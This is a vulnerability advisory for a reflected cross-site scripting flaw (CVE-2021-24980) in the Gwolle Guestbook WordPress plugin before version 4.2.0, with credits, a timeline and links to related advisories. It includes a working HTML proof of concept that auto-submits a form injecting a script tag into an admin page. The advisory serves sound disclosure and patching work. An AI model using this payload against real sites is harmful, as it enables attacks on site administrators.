Gwolle Guestbook < 4.2.0 – Reflected Cross-Site Scripting | CVE 2021-24980 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the gwolle_gb_user_email parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue in an admin page

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=gwolle-gb%2Fentries.php" id="hack" method="POST">
      <input type="hidden" name="gwolle_gb_user_email" value='"><script>alert(/XSS/);</script>' />
      <input type="hidden" name="show" value="user" />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Fixed in 4.2.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

e50bcb39-9a01-433f-81b3-fd4018672b85

Timeline

Publicly Published

2021-11-23 (about 2 years ago)

Added

2021-11-23 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2022-09-26

Title

Comment Guestbook <= 0.8.0 - Admin+ Stored Cross-Site Scripting

Published

2020-07-21

Title

TC Custom JavaScript < 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2021-03-23

Title

GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)

Published

2023-02-23

Title

Simple Portfolio Gallery <= 0.1 - Admin+ Stored XSS

Published

2015-09-14

Title

PowerPress Podcasting < 6.0.5 - Authenticated Cross-Site Scripting (XSS)